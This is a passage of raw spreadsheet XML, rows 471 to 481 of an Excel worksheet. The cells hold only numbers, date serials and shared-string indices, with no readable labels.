        <v>0</v>
      </c>
      <c r="T471">
        <v>1</v>
      </c>
      <c r="U471">
        <v>0</v>
      </c>
      <c r="V471">
        <v>2000</v>
      </c>
      <c r="W471">
        <v>0</v>
      </c>
      <c r="X471">
        <v>0</v>
      </c>
      <c r="Y471">
        <v>0</v>
      </c>
      <c r="Z471">
        <v>0</v>
      </c>
      <c r="AA471">
        <v>0</v>
      </c>
      <c r="AB471">
        <v>100</v>
      </c>
      <c r="AC471">
        <v>1000</v>
      </c>
      <c r="AD471">
        <v>0</v>
      </c>
      <c r="AE471">
        <v>300</v>
      </c>
      <c r="AF471" t="s">
        <v>3829</v>
      </c>
      <c r="AG471">
        <v>28782</v>
      </c>
      <c r="AH471">
        <v>4</v>
      </c>
      <c r="AJ471">
        <v>87</v>
      </c>
      <c r="AK471" t="s">
        <v>3830</v>
      </c>
      <c r="AL471" t="s">
        <v>3830</v>
      </c>
      <c r="AM471" t="s">
        <v>3831</v>
      </c>
      <c r="AN471" t="s">
        <v>68</v>
      </c>
      <c r="AO471">
        <v>2015</v>
      </c>
      <c r="AP471">
        <v>85265338112</v>
      </c>
      <c r="AQ471" t="s">
        <v>3832</v>
      </c>
      <c r="AR471" t="s">
        <v>3829</v>
      </c>
      <c r="AU471">
        <v>20</v>
      </c>
      <c r="AV471">
        <v>0</v>
      </c>
      <c r="AW471">
        <v>8</v>
      </c>
      <c r="AX471">
        <v>1</v>
      </c>
      <c r="AY471">
        <v>8</v>
      </c>
      <c r="AZ471">
        <v>1</v>
      </c>
      <c r="BA471" t="s">
        <v>16902</v>
      </c>
      <c r="BB471" t="s">
        <v>15292</v>
      </c>
      <c r="BC471">
        <v>0</v>
      </c>
      <c r="BD471" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="472" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A472">
        <v>1234</v>
      </c>
      <c r="B472" t="s">
        <v>3833</v>
      </c>
      <c r="C472" t="s">
        <v>99</v>
      </c>
      <c r="D472" t="s">
        <v>3834</v>
      </c>
      <c r="E472" t="s">
        <v>142</v>
      </c>
      <c r="F472" t="s">
        <v>2814</v>
      </c>
      <c r="G472" s="1">
        <v>44169</v>
      </c>
      <c r="H472">
        <v>7159</v>
      </c>
      <c r="I472">
        <v>7159</v>
      </c>
      <c r="J472">
        <v>2</v>
      </c>
      <c r="K472">
        <v>0</v>
      </c>
      <c r="L472">
        <v>2</v>
      </c>
      <c r="M472">
        <v>0</v>
      </c>
      <c r="N472">
        <v>0</v>
      </c>
      <c r="O472">
        <v>0</v>
      </c>
      <c r="P472">
        <v>0</v>
      </c>
      <c r="Q472">
        <v>0</v>
      </c>
      <c r="R472">
        <v>1</v>
      </c>
      <c r="S472">
        <v>0</v>
      </c>
      <c r="T472">
        <v>1</v>
      </c>
      <c r="U472">
        <v>2000000</v>
      </c>
      <c r="V472">
        <v>0</v>
      </c>
      <c r="W472">
        <v>10000</v>
      </c>
      <c r="X472">
        <v>0</v>
      </c>
      <c r="Y472">
        <v>0</v>
      </c>
      <c r="Z472">
        <v>0</v>
      </c>
      <c r="AA472">
        <v>0</v>
      </c>
      <c r="AB472">
        <v>0</v>
      </c>
      <c r="AC472">
        <v>2000</v>
      </c>
      <c r="AD472">
        <v>0</v>
      </c>
      <c r="AE472">
        <v>5000</v>
      </c>
      <c r="AF472" t="s">
        <v>3835</v>
      </c>
      <c r="AG472">
        <v>14440</v>
      </c>
      <c r="AH472">
        <v>12</v>
      </c>
      <c r="AJ472">
        <v>160</v>
      </c>
      <c r="AK472" t="s">
        <v>114</v>
      </c>
      <c r="AL472" t="s">
        <v>114</v>
      </c>
      <c r="AM472" t="s">
        <v>3836</v>
      </c>
      <c r="AN472" t="s">
        <v>82</v>
      </c>
      <c r="AO472">
        <v>2008</v>
      </c>
      <c r="AP472" t="s">
        <v>3837</v>
      </c>
      <c r="AQ472" t="s">
        <v>3838</v>
      </c>
      <c r="AR472" t="s">
        <v>3835</v>
      </c>
      <c r="AS472" t="s">
        <v>71</v>
      </c>
      <c r="AT472" t="s">
        <v>86</v>
      </c>
      <c r="AU472">
        <v>26</v>
      </c>
      <c r="AV472">
        <v>0</v>
      </c>
      <c r="AW472">
        <v>15</v>
      </c>
      <c r="AX472">
        <v>15</v>
      </c>
      <c r="AY472">
        <v>25</v>
      </c>
      <c r="AZ472">
        <v>33</v>
      </c>
      <c r="BA472" t="s">
        <v>16824</v>
      </c>
      <c r="BB472" t="s">
        <v>15143</v>
      </c>
      <c r="BC472" t="s">
        <v>12496</v>
      </c>
      <c r="BD472" t="s">
        <v>12497</v>
      </c>
    </row>
    <row r="473" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A473">
        <v>1363</v>
      </c>
      <c r="B473" t="s">
        <v>3839</v>
      </c>
      <c r="C473" t="s">
        <v>74</v>
      </c>
      <c r="D473" t="s">
        <v>3840</v>
      </c>
      <c r="E473" t="s">
        <v>944</v>
      </c>
      <c r="F473" t="s">
        <v>2407</v>
      </c>
      <c r="G473" s="1">
        <v>44210</v>
      </c>
      <c r="H473">
        <v>7282</v>
      </c>
      <c r="I473">
        <v>7282</v>
      </c>
      <c r="J473">
        <v>1</v>
      </c>
      <c r="K473">
        <v>1</v>
      </c>
      <c r="L473">
        <v>0</v>
      </c>
      <c r="M473">
        <v>1</v>
      </c>
      <c r="N473">
        <v>0</v>
      </c>
      <c r="O473">
        <v>0</v>
      </c>
      <c r="P473">
        <v>2</v>
      </c>
      <c r="Q473">
        <v>0</v>
      </c>
      <c r="R473">
        <v>0</v>
      </c>
      <c r="S473">
        <v>1</v>
      </c>
      <c r="T473">
        <v>1</v>
      </c>
      <c r="U473">
        <v>0</v>
      </c>
      <c r="V473">
        <v>0</v>
      </c>
      <c r="W473">
        <v>0</v>
      </c>
      <c r="X473">
        <v>0</v>
      </c>
      <c r="Y473">
        <v>0</v>
      </c>
      <c r="Z473">
        <v>0</v>
      </c>
      <c r="AA473">
        <v>0</v>
      </c>
      <c r="AB473">
        <v>0</v>
      </c>
      <c r="AC473">
        <v>0</v>
      </c>
      <c r="AD473">
        <v>1</v>
      </c>
      <c r="AE473">
        <v>0</v>
      </c>
      <c r="AF473" t="s">
        <v>3841</v>
      </c>
      <c r="AG473">
        <v>50184</v>
      </c>
      <c r="AH473">
        <v>14</v>
      </c>
      <c r="AJ473">
        <v>220</v>
      </c>
      <c r="AK473" t="s">
        <v>3842</v>
      </c>
      <c r="AL473" t="s">
        <v>3843</v>
      </c>
      <c r="AM473" t="s">
        <v>3844</v>
      </c>
      <c r="AN473" t="s">
        <v>55</v>
      </c>
      <c r="AO473">
        <v>2018</v>
      </c>
      <c r="AP473" t="s">
        <v>3845</v>
      </c>
      <c r="AQ473" t="s">
        <v>3846</v>
      </c>
      <c r="AR473" t="s">
        <v>3847</v>
      </c>
      <c r="AS473" t="s">
        <v>71</v>
      </c>
      <c r="AT473" t="s">
        <v>58</v>
      </c>
      <c r="AU473">
        <v>0</v>
      </c>
      <c r="AV473">
        <v>0</v>
      </c>
      <c r="AW473">
        <v>45</v>
      </c>
      <c r="AX473">
        <v>149</v>
      </c>
      <c r="AY473">
        <v>14</v>
      </c>
      <c r="AZ473">
        <v>9</v>
      </c>
      <c r="BA473" t="s">
        <v>16855</v>
      </c>
      <c r="BB473">
        <v>0</v>
      </c>
      <c r="BC473">
        <v>0</v>
      </c>
      <c r="BD473" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="474" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A474">
        <v>1365</v>
      </c>
      <c r="B474" t="s">
        <v>3848</v>
      </c>
      <c r="C474" t="s">
        <v>99</v>
      </c>
      <c r="D474" t="s">
        <v>3849</v>
      </c>
      <c r="E474" t="s">
        <v>142</v>
      </c>
      <c r="F474" t="s">
        <v>3850</v>
      </c>
      <c r="G474" s="1">
        <v>44202</v>
      </c>
      <c r="H474">
        <v>7322</v>
      </c>
      <c r="I474">
        <v>7322</v>
      </c>
      <c r="J474">
        <v>2</v>
      </c>
      <c r="K474">
        <v>0</v>
      </c>
      <c r="L474">
        <v>1</v>
      </c>
      <c r="M474">
        <v>0</v>
      </c>
      <c r="N474">
        <v>0</v>
      </c>
      <c r="O474">
        <v>0</v>
      </c>
      <c r="P474">
        <v>0</v>
      </c>
      <c r="Q474">
        <v>0</v>
      </c>
      <c r="R474">
        <v>0</v>
      </c>
      <c r="S474">
        <v>0</v>
      </c>
      <c r="T474">
        <v>0</v>
      </c>
      <c r="U474">
        <v>450000</v>
      </c>
      <c r="V474">
        <v>0</v>
      </c>
      <c r="W474">
        <v>50000</v>
      </c>
      <c r="X474">
        <v>0</v>
      </c>
      <c r="Y474">
        <v>0</v>
      </c>
      <c r="Z474">
        <v>0</v>
      </c>
      <c r="AA474">
        <v>0</v>
      </c>
      <c r="AB474">
        <v>0</v>
      </c>
      <c r="AC474">
        <v>0</v>
      </c>
      <c r="AD474">
        <v>0</v>
      </c>
      <c r="AE474">
        <v>0</v>
      </c>
      <c r="AF474" t="s">
        <v>3851</v>
      </c>
      <c r="AG474">
        <v>14440</v>
      </c>
      <c r="AH474">
        <v>12</v>
      </c>
      <c r="AJ474">
        <v>160</v>
      </c>
      <c r="AK474" t="s">
        <v>114</v>
      </c>
      <c r="AL474" t="s">
        <v>114</v>
      </c>
      <c r="AM474" t="s">
        <v>3852</v>
      </c>
      <c r="AN474" t="s">
        <v>82</v>
      </c>
      <c r="AO474">
        <v>2014</v>
      </c>
      <c r="AP474">
        <v>66600040</v>
      </c>
      <c r="AQ474" t="s">
        <v>3853</v>
      </c>
      <c r="AR474" t="s">
        <v>3851</v>
      </c>
      <c r="AS474" t="s">
        <v>179</v>
      </c>
      <c r="AT474" t="s">
        <v>86</v>
      </c>
      <c r="AU474">
        <v>26</v>
      </c>
      <c r="AV474">
        <v>1</v>
      </c>
      <c r="AW474">
        <v>0</v>
      </c>
      <c r="AX474">
        <v>0</v>
      </c>
      <c r="AY474">
        <v>13</v>
      </c>
      <c r="AZ474">
        <v>21</v>
      </c>
      <c r="BA474" t="s">
        <v>16857</v>
      </c>
      <c r="BB474" t="s">
        <v>15227</v>
      </c>
      <c r="BC474" t="s">
        <v>12473</v>
      </c>
      <c r="BD474" t="s">
        <v>12474</v>
      </c>
    </row>
    <row r="475" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A475">
        <v>966</v>
      </c>
      <c r="B475" t="s">
        <v>3854</v>
      </c>
      <c r="C475" t="s">
        <v>157</v>
      </c>
      <c r="D475" t="s">
        <v>3855</v>
      </c>
      <c r="E475" t="s">
        <v>3440</v>
      </c>
      <c r="F475" t="s">
        <v>3856</v>
      </c>
      <c r="G475" s="1">
        <v>44287</v>
      </c>
      <c r="H475">
        <v>7338</v>
      </c>
      <c r="I475">
        <v>7338</v>
      </c>
      <c r="J475">
        <v>0</v>
      </c>
      <c r="K475">
        <v>0</v>
      </c>
      <c r="L475">
        <v>0</v>
      </c>
      <c r="M475">
        <v>0</v>
      </c>
      <c r="N475">
        <v>0</v>
      </c>
      <c r="O475">
        <v>0</v>
      </c>
      <c r="P475">
        <v>0</v>
      </c>
      <c r="Q475">
        <v>4</v>
      </c>
      <c r="R475">
        <v>0</v>
      </c>
      <c r="S475">
        <v>1</v>
      </c>
      <c r="T475">
        <v>1</v>
      </c>
      <c r="U475">
        <v>0</v>
      </c>
      <c r="V475">
        <v>0</v>
      </c>
      <c r="W475">
        <v>0</v>
      </c>
      <c r="X475">
        <v>0</v>
      </c>
      <c r="Y475">
        <v>0</v>
      </c>
      <c r="Z475">
        <v>0</v>
      </c>
      <c r="AA475">
        <v>0</v>
      </c>
      <c r="AB475">
        <v>500</v>
      </c>
      <c r="AC475">
        <v>0</v>
      </c>
      <c r="AD475">
        <v>1</v>
      </c>
      <c r="AE475">
        <v>15000</v>
      </c>
      <c r="AF475" t="s">
        <v>3857</v>
      </c>
      <c r="AG475">
        <v>65216</v>
      </c>
      <c r="AH475">
        <v>16</v>
      </c>
      <c r="AJ475">
        <v>234</v>
      </c>
      <c r="AK475" t="s">
        <v>3858</v>
      </c>
      <c r="AL475" t="s">
        <v>3859</v>
      </c>
      <c r="AM475" t="s">
        <v>3860</v>
      </c>
      <c r="AN475" t="s">
        <v>55</v>
      </c>
      <c r="AO475">
        <v>2006</v>
      </c>
      <c r="AP475" t="s">
        <v>3861</v>
      </c>
      <c r="AQ475" t="s">
        <v>3862</v>
      </c>
      <c r="AR475" t="s">
        <v>3863</v>
      </c>
      <c r="AS475" t="s">
        <v>71</v>
      </c>
      <c r="AT475" t="s">
        <v>58</v>
      </c>
      <c r="AU475">
        <v>7</v>
      </c>
      <c r="AV475">
        <v>2</v>
      </c>
      <c r="AW475">
        <v>0</v>
      </c>
      <c r="AX475">
        <v>0</v>
      </c>
      <c r="AY475">
        <v>55</v>
      </c>
      <c r="AZ475">
        <v>12</v>
      </c>
      <c r="BA475" t="s">
        <v>16786</v>
      </c>
      <c r="BB475" t="s">
        <v>14969</v>
      </c>
      <c r="BC475" t="s">
        <v>12597</v>
      </c>
      <c r="BD475" t="s">
        <v>12598</v>
      </c>
    </row>
    <row r="476" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A476">
        <v>1380</v>
      </c>
      <c r="B476" t="s">
        <v>3864</v>
      </c>
      <c r="C476" t="s">
        <v>3692</v>
      </c>
      <c r="D476" t="s">
        <v>3865</v>
      </c>
      <c r="E476" t="s">
        <v>3866</v>
      </c>
      <c r="F476" t="s">
        <v>3867</v>
      </c>
      <c r="G476" s="1">
        <v>44151</v>
      </c>
      <c r="H476">
        <v>7344</v>
      </c>
      <c r="I476">
        <v>7344</v>
      </c>
      <c r="J476">
        <v>0</v>
      </c>
      <c r="K476">
        <v>0</v>
      </c>
      <c r="L476">
        <v>0</v>
      </c>
      <c r="M476">
        <v>0</v>
      </c>
      <c r="N476">
        <v>400</v>
      </c>
      <c r="O476">
        <v>0</v>
      </c>
      <c r="P476">
        <v>0</v>
      </c>
      <c r="Q476">
        <v>5</v>
      </c>
      <c r="R476">
        <v>1</v>
      </c>
      <c r="S476">
        <v>0</v>
      </c>
      <c r="T476">
        <v>1</v>
      </c>
      <c r="U476">
        <v>0</v>
      </c>
      <c r="V476">
        <v>0</v>
      </c>
      <c r="W476">
        <v>0</v>
      </c>
      <c r="X476">
        <v>0</v>
      </c>
      <c r="Y476">
        <v>0</v>
      </c>
      <c r="Z476">
        <v>0</v>
      </c>
      <c r="AA476">
        <v>0</v>
      </c>
      <c r="AB476">
        <v>100</v>
      </c>
      <c r="AC476">
        <v>1000</v>
      </c>
      <c r="AD476">
        <v>0</v>
      </c>
      <c r="AE476">
        <v>50</v>
      </c>
      <c r="AF476" t="s">
        <v>3864</v>
      </c>
      <c r="AG476">
        <v>25585</v>
      </c>
      <c r="AH476">
        <v>3</v>
      </c>
      <c r="AJ476">
        <v>62</v>
      </c>
      <c r="AK476" t="s">
        <v>3868</v>
      </c>
      <c r="AL476" t="s">
        <v>3869</v>
      </c>
      <c r="AM476" t="s">
        <v>3870</v>
      </c>
      <c r="AN476" t="s">
        <v>68</v>
      </c>
      <c r="AO476">
        <v>2014</v>
      </c>
      <c r="AP476">
        <v>81218972099</v>
      </c>
      <c r="AQ476" t="s">
        <v>3871</v>
      </c>
      <c r="AR476" t="s">
        <v>3872</v>
      </c>
      <c r="AS476" t="s">
        <v>71</v>
      </c>
      <c r="AT476" t="s">
        <v>72</v>
      </c>
      <c r="AU476">
        <v>4</v>
      </c>
      <c r="AV476">
        <v>2</v>
      </c>
      <c r="AW476">
        <v>0</v>
      </c>
      <c r="AX476">
        <v>0</v>
      </c>
      <c r="AY476">
        <v>0</v>
      </c>
      <c r="AZ476">
        <v>15</v>
      </c>
      <c r="BA476" t="s">
        <v>17553</v>
      </c>
      <c r="BB476" t="s">
        <v>15238</v>
      </c>
      <c r="BC476" t="s">
        <v>12484</v>
      </c>
      <c r="BD476">
        <v>0</v>
      </c>
    </row>
    <row r="477" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A477">
        <v>1256</v>
      </c>
      <c r="B477" t="s">
        <v>3873</v>
      </c>
      <c r="C477" t="s">
        <v>99</v>
      </c>
      <c r="D477" t="s">
        <v>3874</v>
      </c>
      <c r="E477" t="s">
        <v>843</v>
      </c>
      <c r="F477" t="s">
        <v>3875</v>
      </c>
      <c r="G477" s="1">
        <v>44173</v>
      </c>
      <c r="H477">
        <v>7415</v>
      </c>
      <c r="I477">
        <v>7415</v>
      </c>
      <c r="J477">
        <v>0</v>
      </c>
      <c r="K477">
        <v>0</v>
      </c>
      <c r="L477">
        <v>0</v>
      </c>
      <c r="M477">
        <v>0</v>
      </c>
      <c r="N477">
        <v>0</v>
      </c>
      <c r="O477">
        <v>0</v>
      </c>
      <c r="P477">
        <v>0</v>
      </c>
      <c r="Q477">
        <v>0</v>
      </c>
      <c r="R477">
        <v>25</v>
      </c>
      <c r="S477">
        <v>0</v>
      </c>
      <c r="T477">
        <v>0</v>
      </c>
      <c r="U477">
        <v>0</v>
      </c>
      <c r="V477">
        <v>0</v>
      </c>
      <c r="W477">
        <v>0</v>
      </c>
      <c r="X477">
        <v>0</v>
      </c>
      <c r="Y477">
        <v>0</v>
      </c>
      <c r="Z477">
        <v>0</v>
      </c>
      <c r="AA477">
        <v>0</v>
      </c>
      <c r="AB477">
        <v>0</v>
      </c>
      <c r="AC477">
        <v>100</v>
      </c>
      <c r="AD477">
        <v>0</v>
      </c>
      <c r="AE477">
        <v>0</v>
      </c>
      <c r="AF477" t="s">
        <v>3876</v>
      </c>
      <c r="AG477">
        <v>14450</v>
      </c>
      <c r="AH477">
        <v>12</v>
      </c>
      <c r="AJ477">
        <v>160</v>
      </c>
      <c r="AK477" t="s">
        <v>114</v>
      </c>
      <c r="AL477" t="s">
        <v>115</v>
      </c>
      <c r="AM477" t="s">
        <v>3877</v>
      </c>
      <c r="AN477" t="s">
        <v>55</v>
      </c>
      <c r="AO477">
        <v>2017</v>
      </c>
      <c r="AP477" t="s">
        <v>3878</v>
      </c>
      <c r="AQ477">
        <v>82213592753</v>
      </c>
      <c r="AR477" t="s">
        <v>3876</v>
      </c>
      <c r="AS477" t="s">
        <v>71</v>
      </c>
      <c r="AT477" t="s">
        <v>58</v>
      </c>
      <c r="AU477">
        <v>0</v>
      </c>
      <c r="AV477">
        <v>0</v>
      </c>
      <c r="AW477">
        <v>0</v>
      </c>
      <c r="AX477">
        <v>0</v>
      </c>
      <c r="AY477">
        <v>18</v>
      </c>
      <c r="AZ477">
        <v>9</v>
      </c>
      <c r="BA477" t="s">
        <v>16830</v>
      </c>
      <c r="BB477" t="s">
        <v>15157</v>
      </c>
      <c r="BC477">
        <v>0</v>
      </c>
      <c r="BD477" t="s">
        <v>9551</v>
      </c>
    </row>
    <row r="478" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A478">
        <v>1215</v>
      </c>
      <c r="B478" t="s">
        <v>3879</v>
      </c>
      <c r="C478" t="s">
        <v>74</v>
      </c>
      <c r="D478" t="s">
        <v>3880</v>
      </c>
      <c r="E478" t="s">
        <v>142</v>
      </c>
      <c r="F478" t="s">
        <v>3881</v>
      </c>
      <c r="G478" s="1">
        <v>44279</v>
      </c>
      <c r="H478">
        <v>7487</v>
      </c>
      <c r="I478">
        <v>7487</v>
      </c>
      <c r="J478">
        <v>2</v>
      </c>
      <c r="K478">
        <v>0</v>
      </c>
      <c r="L478">
        <v>1</v>
      </c>
      <c r="M478">
        <v>0</v>
      </c>
      <c r="N478">
        <v>0</v>
      </c>
      <c r="O478">
        <v>0</v>
      </c>
      <c r="P478">
        <v>0</v>
      </c>
      <c r="Q478">
        <v>0</v>
      </c>
      <c r="R478">
        <v>0</v>
      </c>
      <c r="S478">
        <v>0</v>
      </c>
      <c r="T478">
        <v>0</v>
      </c>
      <c r="U478">
        <v>100000</v>
      </c>
      <c r="V478">
        <v>0</v>
      </c>
      <c r="W478">
        <v>3000</v>
      </c>
      <c r="X478">
        <v>0</v>
      </c>
      <c r="Y478">
        <v>0</v>
      </c>
      <c r="Z478">
        <v>0</v>
      </c>
      <c r="AA478">
        <v>0</v>
      </c>
      <c r="AB478">
        <v>0</v>
      </c>
      <c r="AC478">
        <v>0</v>
      </c>
      <c r="AD478">
        <v>0</v>
      </c>
      <c r="AE478">
        <v>0</v>
      </c>
      <c r="AF478" t="s">
        <v>3882</v>
      </c>
      <c r="AG478">
        <v>59214</v>
      </c>
      <c r="AH478">
        <v>14</v>
      </c>
      <c r="AJ478">
        <v>204</v>
      </c>
      <c r="AK478" t="s">
        <v>1117</v>
      </c>
      <c r="AL478" t="s">
        <v>3883</v>
      </c>
      <c r="AM478" t="s">
        <v>3884</v>
      </c>
      <c r="AN478" t="s">
        <v>68</v>
      </c>
      <c r="AO478">
        <v>2018</v>
      </c>
      <c r="AP478">
        <v>82134676477</v>
      </c>
      <c r="AQ478" t="s">
        <v>3885</v>
      </c>
      <c r="AR478" t="s">
        <v>3886</v>
      </c>
      <c r="AS478" t="s">
        <v>71</v>
      </c>
      <c r="AT478" t="s">
        <v>58</v>
      </c>
      <c r="AU478">
        <v>28</v>
      </c>
      <c r="AV478">
        <v>1</v>
      </c>
      <c r="AW478">
        <v>15</v>
      </c>
      <c r="AX478">
        <v>25</v>
      </c>
      <c r="AY478">
        <v>3</v>
      </c>
      <c r="AZ478">
        <v>3</v>
      </c>
      <c r="BA478" t="s">
        <v>16821</v>
      </c>
      <c r="BB478" t="s">
        <v>15131</v>
      </c>
      <c r="BC478">
        <v>0</v>
      </c>
      <c r="BD478" t="s">
        <v>10000</v>
      </c>
    </row>
    <row r="479" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A479">
        <v>1159</v>
      </c>
      <c r="B479" t="s">
        <v>3887</v>
      </c>
      <c r="C479" t="s">
        <v>157</v>
      </c>
      <c r="D479" t="s">
        <v>3888</v>
      </c>
      <c r="E479" t="s">
        <v>944</v>
      </c>
      <c r="F479" t="s">
        <v>3889</v>
      </c>
      <c r="G479" s="1">
        <v>44253</v>
      </c>
      <c r="H479">
        <v>7505</v>
      </c>
      <c r="I479">
        <v>7505</v>
      </c>
      <c r="J479">
        <v>2</v>
      </c>
      <c r="K479">
        <v>1</v>
      </c>
      <c r="L479">
        <v>6</v>
      </c>
      <c r="M479">
        <v>0</v>
      </c>
      <c r="N479">
        <v>0</v>
      </c>
      <c r="O479">
        <v>0</v>
      </c>
      <c r="P479">
        <v>13</v>
      </c>
      <c r="Q479">
        <v>2</v>
      </c>
      <c r="R479">
        <v>174</v>
      </c>
      <c r="S479">
        <v>18</v>
      </c>
      <c r="T479">
        <v>2</v>
      </c>
      <c r="U479">
        <v>400000</v>
      </c>
      <c r="V479">
        <v>15000</v>
      </c>
      <c r="W479">
        <v>42000</v>
      </c>
      <c r="X479">
        <v>0</v>
      </c>
      <c r="Y479">
        <v>0</v>
      </c>
      <c r="Z479">
        <v>0</v>
      </c>
      <c r="AA479">
        <v>522000</v>
      </c>
      <c r="AB479">
        <v>810</v>
      </c>
      <c r="AC479">
        <v>78300</v>
      </c>
      <c r="AD479">
        <v>192000</v>
      </c>
      <c r="AE479">
        <v>175000</v>
      </c>
      <c r="AF479" t="s">
        <v>3890</v>
      </c>
      <c r="AG479">
        <v>68472</v>
      </c>
      <c r="AH479">
        <v>16</v>
      </c>
      <c r="AJ479">
        <v>237</v>
      </c>
      <c r="AK479" t="s">
        <v>377</v>
      </c>
      <c r="AL479" t="s">
        <v>3891</v>
      </c>
      <c r="AM479" t="s">
        <v>3892</v>
      </c>
      <c r="AN479" t="s">
        <v>55</v>
      </c>
      <c r="AO479">
        <v>1986</v>
      </c>
      <c r="AP479" t="s">
        <v>3893</v>
      </c>
      <c r="AQ479" t="s">
        <v>3894</v>
      </c>
      <c r="AR479" t="s">
        <v>3890</v>
      </c>
      <c r="AS479" t="s">
        <v>71</v>
      </c>
      <c r="AT479" t="s">
        <v>58</v>
      </c>
      <c r="AU479">
        <v>25</v>
      </c>
      <c r="AV479">
        <v>3</v>
      </c>
      <c r="AW479">
        <v>17</v>
      </c>
      <c r="AX479">
        <v>144</v>
      </c>
      <c r="AY479">
        <v>11</v>
      </c>
      <c r="AZ479">
        <v>17</v>
      </c>
      <c r="BA479" t="s">
        <v>16811</v>
      </c>
      <c r="BB479" t="s">
        <v>15090</v>
      </c>
      <c r="BC479">
        <v>0</v>
      </c>
      <c r="BD479" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="480" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A480">
        <v>1200</v>
      </c>
      <c r="B480" t="s">
        <v>3895</v>
      </c>
      <c r="C480" t="s">
        <v>99</v>
      </c>
      <c r="D480" t="s">
        <v>3896</v>
      </c>
      <c r="E480" t="s">
        <v>300</v>
      </c>
      <c r="F480" t="s">
        <v>3897</v>
      </c>
      <c r="G480" s="1">
        <v>44200</v>
      </c>
      <c r="H480">
        <v>7568</v>
      </c>
      <c r="I480">
        <v>7568</v>
      </c>
      <c r="J480">
        <v>1</v>
      </c>
      <c r="K480">
        <v>1</v>
      </c>
      <c r="L480">
        <v>0</v>
      </c>
      <c r="M480">
        <v>1</v>
      </c>
      <c r="N480">
        <v>0</v>
      </c>
      <c r="O480">
        <v>0</v>
      </c>
      <c r="P480">
        <v>0</v>
      </c>
      <c r="Q480">
        <v>0</v>
      </c>
      <c r="R480">
        <v>2</v>
      </c>
      <c r="S480">
        <v>1</v>
      </c>
      <c r="T480">
        <v>0</v>
      </c>
      <c r="U480">
        <v>20000</v>
      </c>
      <c r="V480">
        <v>20000</v>
      </c>
      <c r="W480">
        <v>0</v>
      </c>
      <c r="X480">
        <v>500</v>
      </c>
      <c r="Y480">
        <v>0</v>
      </c>
      <c r="Z480">
        <v>0</v>
      </c>
      <c r="AA480">
        <v>0</v>
      </c>
      <c r="AB480">
        <v>0</v>
      </c>
      <c r="AC480">
        <v>8000</v>
      </c>
      <c r="AD480">
        <v>1</v>
      </c>
      <c r="AE480">
        <v>0</v>
      </c>
      <c r="AF480" t="s">
        <v>3898</v>
      </c>
      <c r="AG480">
        <v>13910</v>
      </c>
      <c r="AH480">
        <v>12</v>
      </c>
      <c r="AJ480">
        <v>157</v>
      </c>
      <c r="AK480" t="s">
        <v>3899</v>
      </c>
      <c r="AL480" t="s">
        <v>3900</v>
      </c>
      <c r="AM480" t="s">
        <v>3901</v>
      </c>
      <c r="AN480" t="s">
        <v>55</v>
      </c>
      <c r="AO480">
        <v>2018</v>
      </c>
      <c r="AP480" t="s">
        <v>3902</v>
      </c>
      <c r="AQ480" t="s">
        <v>3903</v>
      </c>
      <c r="AR480" t="s">
        <v>3898</v>
      </c>
      <c r="AS480" t="s">
        <v>187</v>
      </c>
      <c r="AT480" t="s">
        <v>58</v>
      </c>
      <c r="AU480">
        <v>24</v>
      </c>
      <c r="AV480">
        <v>2</v>
      </c>
      <c r="AW480">
        <v>0</v>
      </c>
      <c r="AX480">
        <v>0</v>
      </c>
      <c r="AY480">
        <v>14</v>
      </c>
      <c r="AZ480">
        <v>4</v>
      </c>
      <c r="BA480" t="s">
        <v>17605</v>
      </c>
      <c r="BB480" t="s">
        <v>15118</v>
      </c>
      <c r="BC480" t="s">
        <v>12541</v>
      </c>
      <c r="BD480">
        <v>0</v>
      </c>
    </row>
    <row r="481" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A481">
        <v>1462</v>
      </c>
      <c r="B481" t="s">
        <v>3904</v>
      </c>
      <c r="C481" t="s">
        <v>3013</v>
      </c>
      <c r="D481" t="s">
        <v>3905</v>
      </c>
      <c r="E481" t="s">
        <v>3906</v>
      </c>
      <c r="F481" t="s">
        <v>3907</v>
      </c>
      <c r="G481" s="1">
        <v>44175</v>
      </c>
      <c r="H481">
        <v>7582</v>
      </c>
      <c r="I481">
        <v>7582</v>
      </c>
      <c r="J481">
        <v>0</v>
      </c>
      <c r="K481">
        <v>1</v>
      </c>
      <c r="L481">
        <v>0</v>
      </c>
      <c r="M481">
        <v>0</v>
      </c>
      <c r="N481">
        <v>0</v>
      </c>
      <c r="O481">
        <v>0</v>
      </c>
      <c r="P481">
        <v>0</v>
      </c>
      <c r="Q481">
        <v>1</v>
      </c>
      <c r="R481">
        <v>1</v>
      </c>
      <c r="S481">
        <v>0</v>
      </c>
      <c r="T481">
        <v>1</v>
      </c>
      <c r="U481">
        <v>0</v>
      </c>
      <c r="V481">
        <v>3000</v>
      </c>
      <c r="W481">
        <v>0</v>
      </c>
      <c r="X481">
        <v>0</v>
      </c>
      <c r="Y481">
        <v>0</v>
      </c>
      <c r="Z481">
        <v>0</v>
      </c>
      <c r="AA481">
        <v>0</v>
      </c>
      <c r="AB481">
        <v>500</v>
      </c>
      <c r="AC481">
        <v>500</v>
      </c>
      <c r="AD481">
        <v>0</v>
      </c>
      <c r="AE481">
        <v>2000</v>
      </c>
      <c r="AF481" t="s">
        <v>3908</v>
      </c>
      <c r="AG481">
        <v>28914</v>
      </c>
      <c r="AH481">
        <v>4</v>
      </c>
      <c r="AJ481">
        <v>84</v>
      </c>
      <c r="AK481" t="s">
        <v>3909</v>
      </c>
      <c r="AL481" t="s">
        <v>3910</v>
      </c>
      <c r="AM481" t="s">
        <v>3911</v>
      </c>
      <c r="AN481" t="s">
        <v>68</v>
      </c>
      <c r="AO481">
        <v>2017</v>
      </c>
      <c r="AP481">
        <v>811636655</v>
      </c>
      <c r="AQ481" t="s">
        <v>3912</v>
      </c>
      <c r="AR481" t="s">
        <v>3908</v>
      </c>
      <c r="AS481" t="s">
        <v>71</v>
      </c>
      <c r="AT481" t="s">
        <v>72</v>
      </c>
      <c r="AU481">
        <v>0</v>
      </c>
      <c r="AV481">
        <v>0</v>
      </c>
